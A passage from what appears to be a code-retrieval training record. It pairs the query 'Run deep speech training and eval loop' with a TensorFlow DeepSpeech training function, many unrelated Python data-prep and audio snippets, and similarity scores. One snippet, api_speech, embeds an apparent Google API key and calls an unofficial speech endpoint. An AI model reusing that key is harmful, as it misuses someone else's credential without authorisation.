torch.eye(dim)\n mu = mus[id]\n inputs.append(mu + torch.randn(n_per_class, dim) @ cov)\n\n # Labels\n labels.append(torch.tensor(n_per_class * [1.0 if id < 2 else 0.0]))\n\n return torch.cat(inputs, dim=0), torch.cat(labels, dim=0)", "def build_dataset(words):\n count = []\n # count.extend(collections.Counter(words).most_common(n_words - 1))\n count.extend(collections.Counter(words).most_common())\n dictionary = dict()\n for word, _ in count:\n dictionary[word] = len(dictionary)\n data = list()\n # unk_count = 0\n for word in words:\n index = dictionary.get(word, 0)\n # if index == 0: # dictionary['UNK']\n # unk_count += 1\n data.append(index)\n # count[0][1] = unk_count\n reversed_dictionary = dict(zip(dictionary.values(), dictionary.keys()))\n data = [data[::2],data[1::2]]\n new_data = list()\n for i in range(len(data[0])):\n new_data.append([data[0][i],data[1][i]])\n data = new_data\n vocabulary_size = len(dictionary)\n print(\"\\n\\ndictionary size = \")\n print(len(dictionary))\n return data, count, dictionary, reversed_dictionary, vocabulary_size", "def dataset(options):\n pass", "def get_unprocessed_data(self, how_many, model_settings, mode):\n candidates = self.data_index[mode]\n if how_many == -1:\n sample_count = len(candidates)\n else:\n sample_count = how_many\n desired_samples = model_settings['desired_samples']\n words_list = self.words_list\n data = np.zeros((sample_count, desired_samples))\n labels = []\n with tf.Session(graph=tf.Graph()) as sess:\n wav_filename_placeholder = tf.placeholder(tf.string, [])\n wav_loader = io_ops.read_file(wav_filename_placeholder)\n wav_decoder = contrib_audio.decode_wav(\n wav_loader, desired_channels=1, desired_samples=desired_samples)\n foreground_volume_placeholder = tf.placeholder(tf.float32, [])\n scaled_foreground = tf.multiply(wav_decoder.audio,\n foreground_volume_placeholder)\n for i in range(sample_count):\n if how_many == -1:\n sample_index = i\n else:\n sample_index = np.random.randint(len(candidates))\n sample = candidates[sample_index]\n input_dict = {wav_filename_placeholder: sample['file']}\n if sample['label'] == SILENCE_LABEL:\n input_dict[foreground_volume_placeholder] = 0\n else:\n input_dict[foreground_volume_placeholder] = 1\n data[i, :] = sess.run(scaled_foreground, feed_dict=input_dict).flatten()\n label_index = self.word_to_index[sample['label']]\n labels.append(words_list[label_index])\n return data, labels", "def generate_datasets(self) -> (tf.data.Dataset, tf.data.Dataset):\n self.obtain_meta_data_frame_for_available_lightcurves()\n positive_example_paths = self.meta_data_frame[self.meta_data_frame['disposition'] == 'PC']['lightcurve_path']\n print(f'{len(positive_example_paths)} positive examples.')\n negative_example_paths = self.meta_data_frame[self.meta_data_frame['disposition'] != 'PC']['lightcurve_path']\n print(f'{len(negative_example_paths)} negative examples.')\n positive_datasets = self.get_training_and_validation_datasets_for_file_paths(positive_example_paths)\n positive_training_dataset, positive_validation_dataset = positive_datasets\n negative_datasets = self.get_training_and_validation_datasets_for_file_paths(negative_example_paths)\n negative_training_dataset, negative_validation_dataset = negative_datasets\n training_dataset = self.get_ratio_enforced_dataset(positive_training_dataset, negative_training_dataset,\n positive_to_negative_data_ratio=1)\n validation_dataset = positive_validation_dataset.concatenate(negative_validation_dataset)\n if self.trial_directory is not None:\n self.log_dataset_file_names(training_dataset, dataset_name='training')\n self.log_dataset_file_names(validation_dataset, dataset_name='validation')\n training_dataset = training_dataset.shuffle(buffer_size=len(list(training_dataset)))\n training_preprocessor = lambda file_path: tuple(tf.py_function(self.training_preprocessing,\n [file_path], [tf.float32, tf.float32]))\n training_dataset = training_dataset.map(training_preprocessor, num_parallel_calls=16)\n training_dataset = training_dataset.padded_batch(self.batch_size, padded_shapes=([None, 2], [None])).prefetch(\n buffer_size=tf.data.experimental.AUTOTUNE)\n validation_preprocessor = lambda file_path: tuple(tf.py_function(self.evaluation_preprocessing,\n [file_path], [tf.float32, tf.float32]))\n validation_dataset = validation_dataset.map(validation_preprocessor, num_parallel_calls=4)\n validation_dataset = validation_dataset.padded_batch(1, padded_shapes=([None, 2], [None])).prefetch(\n buffer_size=tf.data.experimental.AUTOTUNE)\n return training_dataset, validation_dataset", "def _make_data(self):\n pdf_datasets_all = make_pdf_datasets(self.pdf_list, self.xlims, self.ylims, self.tlims, self.dims, 9)\n self.pdf_dataset = np.concatenate(pdf_datasets_all, axis = 0)\n self.PDE_dataset = make_PDE_dataset(self.num_collocation, self.xlims, self.ylims, self.tlims, self.dims)\n self.BC_dataset = make_BC_dataset(self.num_BC, self.xlims, self.ylims, self.tlims, self.dims)", "def sample_survey(self, **kwargs):", "def generate(model, voc, maxlen=20, diversity=0.5, numchars=100):\n\n text, char_indices, indices_char = voc\n chars = set(text)\n start_index = random.randint(0, len(text) - maxlen - 1) \n generated = ''\n sentence = text[start_index: start_index + maxlen]\n #print(\"Insert text to start from [min 20 chars]:\")\n #sentence = str(raw_input())\n #sentence = sentence[:maxlen]\n generated += sentence\n print('----- Generating with seed: \"' + sentence + '\"')\n sys.stdout.write(generated)\n\n for i in range(numchars):\n x = np.zeros((1, maxlen, len(chars)))\n for t, char in enumerate(sentence):\n x[0, t, char_indices[char]] = 1.\n \n preds = model.predict(x, verbose=0)[0]\n next_index = sample(preds, diversity)\n next_char = indices_char[next_index]\n generated += next_char\n sentence = sentence[1:] + next_char\n sys.stdout.write(next_char)\n sys.stdout.flush()\n print()", "def generateFeatureData(directory, outFileName='tmp/features.txt', isClassifying=False):\n\n audioList = getAudioFiles(directory)\n\n outFile = open(outFileName, \"w\")\n\n for audio in audioList:\n features = audio.getFeatures()\n \n if isClassifying: # We are classifying, we don't know type\n audioType = '0'\n else: # We are generating training data. Try to predict using file name\n audioType = '1' if audio.predictType() == 'Music' else '-1'\n \n outFile.write(audioType + ' ' + features + ' # ' + audio.name + '\\n')\n\n outFile.close()\n\n return audioList", "def prepare_dataset(self, data_raw):\n\n self._logger.debug(f'Preparing dataset ({len(data_raw)} lines)...')\n data = []\n line_count = 0\n sample_count = 0\n sample_count_failed = 0\n\n for line in tqdm(data_raw):\n line_count += 1\n #self._logger.debug(f'Line {line_count}/{len(data_raw)}')\n\n try:\n # TODO Call prepare_sample() here?\n sample = {}\n\n sample['text'] = line['text']\n sample['text_tokenized'] = None # set by add_tokens()\n sample['text_attention_mask'] = None # set by add_tokens()\n sample['item_name'] = line['string']\n self.add_tokens(sample)\n sample['text_mention_mask'] = None # set by add_mention_mask()\n self.add_mention_mask(sample)\n\n # Once for correct Wikidata item\n sample['item_id'] = line['correct_id']\n sample['item_pbg'] = self._pbg.get_item_embedding(line['correct_id'])\n sample['item_glove'] = np.empty((1, 900)) # TODO\n sample['answer'] = True\n data.append(sample)\n sample_count += 1\n\n # Once for wrong Wikidata item\n sample['item_id'] = line['wrong_id']\n sample['item_pbg'] = self._pbg.get_item_embedding(line['wrong_id'])\n sample['item_glove'] = np.empty((1, 900)) # TODO\n sample['answer'] = False\n data.append(sample)\n sample_count += 1\n\n except ValueError as e: # skip sample when there is no embedding found\n self._logger.info(str(e))\n sample_count_failed += 1\n continue\n\n self._logger.debug(f'Prepared {sample_count} samples from {line_count} lines (skipped {sample_count_failed} failed)')\n\n return data", "def dynamic(seq: List[int]):\n return Data._create_dataset(seq, pad=False)", "def get_data(self):\n if self.random_seeds: \n self._validate_random_seeds()\n seed_iter = list(map(iter,self.random_seeds))\n nsamples = len(self.random_seeds[0])\n else:\n seed_iter = None\n nsamples = self.numsamples\n self._set_meta_features()\n for _ in tqdm(range(nsamples)):\n self._update_meta_features(seed_iter)\n self._sample()\n yield self._extract_features()", "def build_training_data():\r\n for i in range(len(FILE_NAMES)):\r\n input_text = read_file(FILE_NAMES[i])\r\n list_of_word_lines = limiting_sentence_length(input_text)\r\n data = create_training_data_file(list_of_word_lines, LANGUAGE[i])\r\n write_training_data(data, LANGUAGE[i])\r\n merge_training_data()", "def sample(self, n_samples, batch_size, word_0=-1, gen_type='multinom'):\n # Compute the number of batches\n if n_samples != batch_size:\n n_batches = n_samples // batch_size + 1\n else:\n n_batches = 1\n\n samples = torch.zeros(n_batches * batch_size, self.max_len).long()\n\n # Produce samples by batches\n for batch in range(n_batches):\n hidden = self.init_hidden(batch_size)\n if word_0 < 0:\n # Initialize every sequence with a random word from the vocabulary\n input = torch.randint(low=0, high=self.voc_dim, size=(batch_size,))\n else:\n # Initialize every sequence with 'word_0' as starting token\n input = torch.LongTensor([word_0] * batch_size)\n if self.gpu:\n input = input.cuda()\n\n # Iterate the generator until we reach the maximum length allowed for the sequence\n for i in range(self.max_len):\n # Forward pass where we keep track of the hidden states of the network\n output, hidden = self.forward(input, hidden, require_hidden=True)\n\n if gen_type == 'multinom':\n # Generate the next token in the sequence randomly using the output as a multinomial distribution\n next_token = torch.multinomial(torch.exp(output), 1)\n elif gen_type == 'argmax':\n # Choose the most probable token in the sequence deterministically\n next_token = torch.argmax(torch.exp(output), 1)\n\n # Append generated ith tokens to batch #'batch'\n samples[batch * batch_size:(batch + 1) * batch_size, i] = next_token.view(-1)\n\n # Add generated tokens to the input\n input = next_token.view(-1)\n\n # We need this because the number of samples might not be divisible by the size of batches\n samples = samples[:n_samples]\n\n return samples", "def run(self):\n from audio import AudioRecorder\n\n loader = SingleInputLoader(128)\n recorder = AudioRecorder()\n\n with tf.Session() as sess:\n model = create_default_model('record', 128, loader)\n model.restore(sess, 'train/best-weights')\n \n while True:\n print('Listening...')\n audio, width = recorder.record()\n audio = np.array(audio)\n\n #calculate the power spectrum of the audio and of sampling rate 16000 \n input_ = preprocess.calculatePowerSpectrogram(audio, 16000)\n\n loader.set_input(input_)\n [decoded] = model.step(sess, loss=False, update=False, decode=True)\n\n decoded_ids_paths = [Test.extract_decoded_ids(path) for path in decoded]\n \n for decoded_path in decoded_ids_paths:\n decoded_ids = next(decoded_path)\n decoded_str = self.idsToSentence(decoded_ids)\n print('Predicted: {}'.format(decoded_str))", "def generate(self, no_samples):\n raise NotImplementedError(\"Implement this method.\")", "def api_speech(data, ua):\n # Random header\n headers = {\n 'Content-Type': 'audio/x-flac; rate=16000;',\n 'User-Agent': ua['google chrome'],\n }\n params = (\n ('client', 'chromium'),\n ('pFilter', '0'),\n ('lang', 'en'),\n ('key', 'AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw'),\n )\n\n proxies = None\n\n if len(data) == 0:\n return\n\n # api call\n try:\n response = requests.post('http://www.google.com/speech-api/v2/recognize',\n proxies=proxies,\n headers=headers,\n params=params,\n data=data)\n except Exception as inst:\n print(inst)\n\n # Parse api response\n try:\n transcript = extract_transcript(response.text)\n return transcript\n except Exception as inst:\n print(inst)\n return", "def generate_dataset(self):\n dataset = []\n for i in range(self._num_instances):\n dataset.append(self._generate_instance())\n description = {\"num_instances\": self._num_instances,\n \"num_curves\": self._num_curves,\n \"num_eval_points\": self._num_eval_points,\n \"num_control_points\": self._num_control_points,\n \"min_distance\": self._min_distance,\n \"min_length\": self._min_length,\n \"seed\": self._seed}\n return dataset, description", "def readAudioData(self, shouldProcess):\n if shouldProcess:\n return gatherData(self.playlists) \n else:\n return pd.read_pickle(\"data/audioDF.pkl\")", "def prepare_data(vocabulary_size):\n print(\"Downloading data from \" + _DATA_DIR_ +\"..\")\n getData(_DATA_DIR_)\n print(\"Creating Vocabulary..\")\n create_vocabulary( _VOCAB_DIR_, _RAW_SENTENCES_DIR_, vocabulary_size )\n print(\"Converting sentences to sequences of ids..\")\n data_to_token_ids( _RAW_SENTENCES_DIR_ , _SENTENCES_DIR, _VOCAB_DIR_ )", "def preprocess_dataset(dataset_path, SAMPLES_TO_CONSIDER: int, num_mfcc = 13, n_fft = 2048, hop_length = 512):\r\n\r\n data = {\r\n 'mapping': [],\r\n 'labels': [],\r\n 'MFCCs': [],\r\n 'files': []\r\n }\r\n\r\n # loop through all sub-dirs\r\n total_samples = 0\r\n valid_samples = 0\r\n for i, (dirpath, dirname, filenames) in tqdm(enumerate(os.walk(dataset_path))):\r\n\r\n # ensure we're at sub-folder level\r\n if dirpath is not dataset_path:\r\n # save label (i.e., sub-folder name) in the mapping\r\n label = dirpath.partition('speech_commands_subset')[-1][1:]\r\n\r\n data['mapping'].append(label)\r\n print(\"\\nProcessing: '{}'\".format(label))\r\n print(\"number of files for each class: \", len(filenames))\r\n # process all audio files\r\n for f in filenames:\r\n total_samples += 1\r\n file_path = os.path.join(dirpath, f)\r\n\r\n # load audio file and slice it to ensure length consistency among different files\r\n signal, sample_rate = librosa.load(file_path)\r\n # print(signal.shape)\r\n # print(type(signal[0]))\r\n\r\n # drop audio files with less than pre-decided number of samples\r\n if len(signal) >= SAMPLES_TO_CONSIDER:\r\n valid_samples += 1\r\n # ensure consistency of the length of the signal\r\n signal = signal[:SAMPLES_TO_CONSIDER]\r\n\r\n # extract MFCCs\r\n MFCCs = librosa.feature.mfcc(signal, sample_rate, n_mfcc = num_mfcc, n_fft = n_fft, \r\n hop_length = hop_length) \r\n # print(MFCCs.shape)\r\n # print(type(MFCCs[0,0]))\r\n\r\n # store data for analysed track\r\n data['MFCCs'].append(MFCCs.T.tolist())\r\n data['labels'].append(i-1)\r\n # data['files'].append(file_path)\r\n # print(\"{}: {}\".format(file_path, i-1))\r\n\r\n # if valid_samples == 20:\r\n # valid_samples =0\r\n # break\r\n print(\"\\ntotal samples: \", total_samples)\r\n print(\"\\nvalid_samples: \", valid_samples)\r\n\r\n \r\n return data", "def setup(self):\n in_dataset, out_dataset = self.get_datasets()\n \n out_dataset[0].create_dataset(in_dataset[0])\n out_dataset[1].create_dataset(in_dataset[1])\n\n in_pData, out_pData = self.get_plugin_datasets()\n\n in_pData[0].plugin_data_setup( 'SINOGRAM',multiple)\n out_pData[0].plugin_data_setup( 'PROJECTION','multiple')\n\n in_pData[1].plugin_data_setup( 'PROJECTION',)\n out_pData[1].plugin_data_setup( 'PROJECTION','multiple')", "def eval(self):\r\n if WORDSPLIT:\r\n train, test = self.get_train_test_wordsplit()\r\n elif UTTERANCE_SPLIT:\r\n train, test, val = self.get_train_test_utterance_split()\r\n wordlist = joblib.load('wordlist.pkl')\r\n dictionary = joblib.load('dict.pkl')\r\n phones = joblib.load('phones.pkl')\r\n metadata_help = {'wordlist': wordlist, 'dictionary': dictionary, 'phones': phones}\r\n p2c = utils.phone2class(phones)\r\n c2p = utils.class2phone(phones)\r\n \"\"\"Get test generator\"\"\"\r\n test_data = Dataset({'files': test, 'mode': 'eval', 'metadata_help': metadata_help})\r\n test_gen = data.DataLoader(test_data, batch_size=1,\r\n shuffle=True, collate_fn=test_data.collate_eval, drop_last=True)\r\n for batch_number, features in tqdm(enumerate(test_gen)):\r\n spectrograms = features['spectrograms']\r\n phones = features['phones']\r\n batch_metadata = features['metadata'][0]\r\n self.G = self.G.eval()\r\n\r\n outputs = self.G(spectrograms)\r\n outputs = np.squeeze(outputs.detach().cpu().numpy())\r\n phones = np.squeeze(phones.detach().cpu().numpy())\r\n phones = phones.astype(dtype=int)\r\n phones = [c2p[x] for x in phones]\r\n\r\n output_classes = np.argmax(outputs, axis=1)\r\n\r\n \"\"\"Decode the output predictions into a phone sequence\"\"\"\r\n # https://stackoverflow.com/questions/38065898/how-to-remove-the-adjacent-duplicate-value-in-a-numpy-array\r\n duplicates_eliminated = np.asarray([k for k, g in groupby(output_classes)])\r\n blanks_eliminated = duplicates_eliminated[duplicates_eliminated != 0]\r\n predicted_phones_ = [c2p[x] for x in blanks_eliminated]\r\n \"\"\"remove SOS and EOS\"\"\"\r\n predicted_phones = []\r\n for x in predicted_phones_:\r\n if x != 'SOS' and x != 'EOS':\r\n predicted_phones.append(x)\r\n\r\n data_to_save = {'speaker': batch_metadata['speaker'],\r\n 'word': batch_metadata['word'],\r\n 'true_phones': batch_metadata['phones'],\r\n 'predicted_phones': predicted_phones}\r\n dump_path = os.path.join(self.predict_dir, batch_metadata['utterance'] + '.pkl')\r\n joblib.dump(data_to_save, dump_path)", "def seed_dataset(data):\n\n timestamp = datetime.datetime.now()\n\n try:\n # set values\n dataset = Dataset()\n dataset.name = f'Dataset {timestamp.utcnow()}'\n dataset.description = f'Dataset created on {timestamp}'\n dataset.date_created = timestamp\n session.add(dataset)\n session.commit()\n print(f'Dataset {dataset.id} inserted')\n\n # seed the audiofile table\n Seed.seed_audio_file(dataset.id, data)\n except Exception as e:\n print(f'seed_dataset: {e}')", "def generate_data(path_to_metadata='../data/metadata.csv', path_to_data='../data/recordings', pcen=False):\n\n metadata = pd.read_csv(path_to_metadata)\n metadata = metadata.sample(frac=1).reset_index(drop=True)\n\n features_df = extract_features(metadata, path_to_data, sr=None, pcen=pcen)\n\n X = np.array(features_df.features.to_list())\n y = np.array(features_df.whistling.to_list())\n y1 = np.array(features_df.rhonchus.to_list())\n y2 = np.array(features_df.survival.to_list())\n\n return X, y, y1, y2", "def transcribe_asr(waveform, args, task, generator, models, sp, tgt_dict):\n num_features = 80\n output = torchaudio.compliance.kaldi.fbank(waveform, num_mel_bins=num_features)\n output_cmvn = calcMN(output.cpu().detach().numpy())\n\n # size (m, n)\n source = torch.tensor(output_cmvn)\n source = source.to(dev)\n frames_lengths = torch.LongTensor([source.size(0)])\n\n # size (1, m, n). In general, if source is (x, m, n), then hypos is (x, ...)\n source.unsqueeze_(0)\n sample = {'net_input': {'src_tokens': source, 'src_lengths': frames_lengths}}\n\n hypos = task.inference_step(generator, models, sample)\n\n assert len(hypos) == 1\n transcription = []\n print(hypos)\n for i in range(len(hypos)):\n # Process top predictions\n hyp_words = process_predictions_asr(args, hypos[i], sp, tgt_dict)\n transcription.append(hyp_words)\n\n print('transcription:', transcription)\n return transcription", "def prepare_corpus(self, final_training):\n if final_training:\n df_seq = self.data_processor.create_user_click_sequence()\n else:\n df_seq = self.data_processor.create_user_click_sequence(\n end_date=self.config[\"test_split_date\"]\n )\n sentences = df_seq[\"merchant_seq\"].values.tolist()\n sentences = [list(map(str, sent)) for sent in sentences]\n return sentences" ]
[ "0.64441484", "0.63849944", "0.62619036", "0.6223697", "0.6217612", "0.6186893", "0.61415535", "0.61275953", "0.6118419", "0.6101546", "0.606264", "0.6042652", "0.6013309", "0.59911335", "0.5944916", "0.5930794", "0.5930794", "0.5919748", "0.59102166", "0.5889595", "0.58870393", "0.58663243", "0.5860178", "0.58095616", "0.5807196", "0.5799068", "0.5778767", "0.5776289", "0.57585067", "0.5744408", "0.5742479", "0.5705505", "0.5705056", "0.57013184", "0.56870687", "0.5665761", "0.5651931", "0.5647774", "0.56330127", "0.5622853", "0.5598242", "0.5588493", "0.5588493", "0.5587593", "0.5579131", "0.5578032", "0.5559762", "0.55502516", "0.5546921", "0.55416715", "0.5530227", "0.5526114", "0.5515457", "0.5505887", "0.5503988", "0.54981154", "0.5494768", "0.5494431", "0.5488087", "0.548588", "0.5479531", "0.54772115", "0.547661", "0.5465097", "0.54596984", "0.5449322", "0.5420463", "0.5401676", "0.54004186", "0.53981674", "0.5392163", "0.53867745", "0.5377654", "0.53739977", "0.53732204", "0.53730905", "0.53590965", "0.5355586", "0.5355128", "0.5351516", "0.53455293", "0.5333028", "0.5328273", "0.5320349", "0.53187054", "0.5316439", "0.53135955", "0.5310265", "0.5304381", "0.52973604", "0.52962637", "0.5295887", "0.5295874", "0.5291921", "0.5287283", "0.52856934", "0.5284328", "0.5276923", "0.52757376", "0.52749985" ]
0.65369
0
Run deep speech training and eval loop.
def run_deep_speech(): global FLAGS tf.set_random_seed(FLAGS.seed) # Data precessing tf.logging.info("Data Processing...") train_speech_dataset = generate_dataset(FLAGS.data_dir, partition="train") eval_speech_dataset = generate_dataset(FLAGS.data_dir, partition="dev") # Number of label classes. Label string is "[a-z]' -" num_classes = len(train_speech_dataset.speech_labels) # not available in 1.4 distribution_strategy = distribution_utils.get_distribution_strategy(num_gpus=FLAGS.num_gpus) run_config = es.RunConfig(train_distribute=distribution_strategy, session_config=get_session_config()) estimator = es.Estimator( model_fn=model_fn, model_dir=FLAGS.model_dir, config=run_config, params={"num_classes": num_classes}) run_params = { "batch_size": FLAGS.batch_size, "train_epochs": FLAGS.train_epochs, "rnn_hidden_size": FLAGS.rnn_hidden_size, "rnn_hidden_layers": FLAGS.rnn_hidden_layers, "rnn_type": FLAGS.rnn_type, "is_bidirectional": FLAGS.is_bidirectional, "use_bias": FLAGS.use_bias } benchmark_logger = logger.get_benchmark_logger() benchmark_logger.log_run_info( model_name="deep_speech", dataset_name="LibriSpeech", run_params=run_params, test_id=FLAGS.benchmark_test_id) train_hooks = hooks_helper.get_train_hooks(FLAGS.hooks, model_dir=FLAGS.model_dir, batch_size=FLAGS.batch_size) per_replica_batch_size = distribution_utils.per_replica_batch_size(FLAGS.batch_size, FLAGS.num_gpus) def input_fn_train(): return train_speech_dataset.input_fn(batch_size=per_replica_batch_size) def input_fn_eval(): return eval_speech_dataset.input_fn(batch_size=per_replica_batch_size) # total_training_cycle = FLAGS.train_epochs // FLAGS.epochs_between_evals total_training_cycle = FLAGS.train_epochs for cycle_index in range(total_training_cycle): tf.logging.info(f"Starting train cycle: {cycle_index + 1} / {total_training_cycle}") # Perform batch_wise dataset shuffling train_speech_dataset.batch_wise_shuffle(FLAGS.batch_size) # Train estimator.train(input_fn=input_fn_train, hooks=train_hooks) # Evaluation tf.logging.info("Starting to evaluate...") eval_results = evaluate_model(estimator, speech_labels=eval_speech_dataset.speech_labels, entries=eval_speech_dataset.entries, input_fn_eval=input_fn_eval) # Log the WER and CER results. benchmark_logger.log_evaluation_result(eval_results) tf.logging.info( f"Iteration {cycle_index + 1}: WER = {eval_results[_WER_KEY]:.2f}, CER = {eval_results[_CER_KEY]:.2f}")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def run(self):\n from audio import AudioRecorder\n\n loader = SingleInputLoader(128)\n recorder = AudioRecorder()\n\n with tf.Session() as sess:\n model = create_default_model('record', 128, loader)\n model.restore(sess, 'train/best-weights')\n \n while True:\n print('Listening...')\n audio, width = recorder.record()\n audio = np.array(audio)\n\n #calculate the power spectrum of the audio and of sampling rate 16000 \n input_ = preprocess.calculatePowerSpectrogram(audio, 16000)\n\n loader.set_input(input_)\n [decoded] = model.step(sess, loss=False, update=False, decode=True)\n\n decoded_ids_paths = [Test.extract_decoded_ids(path) for path in decoded]\n \n for decoded_path in decoded_ids_paths:\n decoded_ids = next(decoded_path)\n decoded_str = self.idsToSentence(decoded_ids)\n print('Predicted: {}'.format(decoded_str))", "def eval(self):\n # self.recognizer.eval()\n self.detector.eval()\n self.shared_conv.eval()", "def evaluate():\n\tmodel.eval()\n\tstddev = 1 # And mean=0\n\tfor batch_idx, (data, _) in enumerate(syn_test_loader):\n\t\tdata = data.cuda()\n\t\tif batch_idx == 0:\n\t\t\tnoise = torch.autograd.Variable(torch.randn(batch_size, bottleneck).cuda() * stddev)\n\t\t\tsample_representation(\"orig_nat\", data, noise)\n\t\t\tsample_representation(\"natural\", data, noise)\n\t\t\tsample_representation(\"orig_syn\", data, noise)\n\t\t\tsample_representation(\"synth\", data, noise)", "def train(self):\n params = self.params\n self.embedder.train()\n self.proj.train()\n\n # training variables\n losses = []\n ns = 0 # number of sentences\n nw = 0 # number of words\n t = time.time()\n\n iterator = self.get_iterator('train')\n lang_id = params.lang2id['en']\n\n while True:\n\n # batch\n try:\n batch = next(iterator)\n except StopIteration:\n break\n if self.n_sent == 1:\n (x, lengths), idx = batch\n x, lengths = truncate(x, lengths, params.max_len, params.eos_index)\n else:\n (sent1, len1), (sent2, len2), idx = batch\n sent1, len1 = truncate(sent1, len1, params.max_len, params.eos_index)\n sent2, len2 = truncate(sent2, len2, params.max_len, params.eos_index)\n x, lengths, _, _ = concat_batches(sent1, len1, lang_id, sent2, len2, lang_id, params.pad_index, params.eos_index, reset_positions=False)\n y = self.data['train']['y'][idx]\n bs = len(lengths)\n\n # cuda\n x, y, lengths = to_cuda(x, y, lengths)\n\n # loss\n output = self.proj(self.embedder.get_embeddings(x, lengths, positions=None, langs=None))\n if self.is_classif:\n loss = F.cross_entropy(output, y, weight=self.weights)\n else:\n loss = F.mse_loss(output.squeeze(1), y.float())\n\n # backward / optimization\n self.optimizer_e.zero_grad()\n self.optimizer_p.zero_grad()\n loss.backward()\n self.optimizer_e.step()\n self.optimizer_p.step()\n\n # update statistics\n ns += bs\n nw += lengths.sum().item()\n losses.append(loss.item())\n\n # log\n if ns != 0 and ns % (10 * bs) < bs:\n logger.info(\n \"GLUE - %s - Epoch %s - Train iter %7i - %.1f words/s - %s Loss: %.4f\"\n % (self.task, self.epoch, ns, nw / (time.time() - t), 'XE' if self.is_classif else 'MSE', sum(losses) / len(losses))\n )\n nw, t = 0, time.time()\n losses = []\n\n # epoch size\n if params.epoch_size != -1 and ns >= params.epoch_size:\n break", "def run(self, verbose=0):\n self.verbose = verbose\n self._preproc()\n self._lda()\n self._evaluate()", "def run(self):\n for _ in range(self.epoch, conf.FX_MAX_EPOCHS):\n self.train()\n\n with torch.no_grad():\n self.test()\n\n self.epoch += 1\n self.save_ck()\n\n self.show_completion_msg()", "def learn(self):\n\n for i in range(1, self.args.numIters + 1):\n # bookkeeping\n log.info(f'Starting Iter #{i} ...')\n # examples of the iteration\n if not self.skipFirstSelfPlay or i > 1:\n iterationTrainExamples = deque([], maxlen=self.args.maxlenOfQueue)\n\n for _ in tqdm(range(self.args.numEps), desc=\"Self Play\"):\n self.mcts = MCTS(self.game, self.nnet, self.args) # reset search tree\n iterationTrainExamples += self.executeEpisode()\n\n # save the iteration examples to the history \n self.trainExamplesHistory.append(iterationTrainExamples)\n\n if len(self.trainExamplesHistory) > self.args.numItersForTrainExamplesHistory:\n log.warning(\n f\"Removing the oldest entry in trainExamples. len(trainExamplesHistory) = {len(self.trainExamplesHistory)}\")\n self.trainExamplesHistory.pop(0)\n # backup history to a file\n # NB! the examples were collected using the model from the previous iteration, so (i-1) \n self.saveTrainExamples(i - 1)\n\n # shuffle examples before training\n trainExamples = []\n for e in self.trainExamplesHistory:\n trainExamples.extend(e)\n shuffle(trainExamples)\n\n # training new network, keeping a copy of the old one\n self.nnet.save_checkpoint(folder=self.args.checkpoint, filename='temp.pth.tar')\n self.pnet.load_checkpoint(folder=self.args.checkpoint, filename='temp.pth.tar')\n pmcts = MCTS(self.game, self.pnet, self.args)\n\n self.nnet.train(trainExamples)\n nmcts = MCTS(self.game, self.nnet, self.args)\n\n log.info('PITTING AGAINST PREVIOUS VERSION')\n arena = Arena(lambda x: np.argmax(pmcts.getActionProb(x, temp=0)),\n lambda x: np.argmax(nmcts.getActionProb(x, temp=0)), self.game)\n pwins, nwins, draws = arena.playGames(self.args.arenaCompare)\n\n log.info('NEW/PREV WINS : %d / %d ; DRAWS : %d' % (nwins, pwins, draws))\n if pwins + nwins == 0 or float(nwins) / (pwins + nwins) < self.args.updateThreshold:\n log.info('REJECTING NEW MODEL')\n self.nnet.load_checkpoint(folder=self.args.checkpoint, filename='temp.pth.tar')\n else:\n log.info('ACCEPTING NEW MODEL')\n self.nnet.save_checkpoint(folder=self.args.checkpoint, filename=self.getCheckpointFile(i))\n self.nnet.save_checkpoint(folder=self.args.checkpoint, filename='best.pth.tar')", "def run_training_loop():\n logging.info(\"Starting the training loop.\")\n\n trainer = trainer_class(\n output_dir=output_dir,\n train_env=train_env,\n eval_env=eval_env,\n trajectory_dump_dir=trajectory_dump_dir,\n )\n trainer.training_loop(n_epochs=n_epochs)", "def run_step(self):\n assert self.model.training, \"[SimpleTrainer] model was changed to eval mode!\"\n start = time.perf_counter()\n \"\"\"\n If your want to do something with the data, you can wrap the dataloader.\n \"\"\"\n data = next(self._data_loader_iter)\n data_time = time.perf_counter() - start\n\n \"\"\"\n If your want to do something with the losses, you can wrap the model.\n \"\"\"\n loss_dict = self.model(data)\n losses = sum(loss for loss in loss_dict.values())\n self._detect_anomaly(losses, loss_dict)\n\n metrics_dict = loss_dict\n metrics_dict[\"data_time\"] = data_time\n self._write_metrics(metrics_dict)\n \n validation_data = next(self.validation_data_loader_iter)\n val_losses_dict = self.model(validation_data)\n val_losses = sum(loss for loss in val_losses_dict.values())\n self._detect_anomaly(val_losses, val_losses_dict)\n\n val_metrics_dict = val_losses_dict\n val_metrics_dict[\"data_time\"] = data_time\n self._write_validation_metrics(val_metrics_dict)\n\n \"\"\"\n If you need accumulate gradients or something similar, you can\n wrap the optimizer with your custom `zero_grad()` method.\n \"\"\"\n self.optimizer.zero_grad()\n losses.backward()\n\n \"\"\"\n If you need gradient clipping/scaling or other processing, you can\n wrap the optimizer with your custom `step()` method.\n \"\"\"\n self.optimizer.step()", "def run(self):\n # Observe the game by randomly sampling actions from the environment\n # and performing those actions\n self.__observe__()\n for i in xrange(self.num_epochs):\n self.environment.resetStatistics()\n time_now = time.time()\n for j in xrange(self.train_steps_per_epoch):\n # Get action using epsilon-greedy strategy\n action = self.__sample_epsilon_action__()\n # Perform action based on epsilon-greedy search and store the transitions\n # in experience replay\n self.__supply_action_to_environment__(action)\n # If the environment is in the terminal state, reset the environment, and\n # perform self.stack_num actions to reset the environment\n self.isGameOver()\n if j % self.train_frequency == 0:\n # print \"Started training\"\n # Sample minibatch of size self.minibatch_size from experience replay\n minibatch = self.experience_replay.sample()\n minibatch_states, minibatch_action, minibatch_reward, minibatch_next_states, \\\n minibatch_terminals = minibatch\n cost = self.network.train_network(minibatch_states,\n minibatch_action,\n minibatch_reward,\n minibatch_terminals,\n minibatch_next_states)\n if j % self.record_frequency == 0:\n total_score, num_games = self.environment.getStatistics()\n avg_score = total_score / num_games\n self.network.record_average_qvalue(\n self.experience_replay.getCurrentState(),\n i * self.train_steps_per_epoch + j,\n self.epsilon, avg_score)\n # Epsilon annealing\n self.__anneal_epsilon__()\n # if self.time_step % 1000 == 0:\n # print \"Cost at iteration\", self.time_step, \" is\", cost\n # print \"Value of epsilon is\", self.epsilon\n self.steps += 1\n if j % self.copy_steps == 0:\n self.network.copy_weights()\n total_score, num_games = 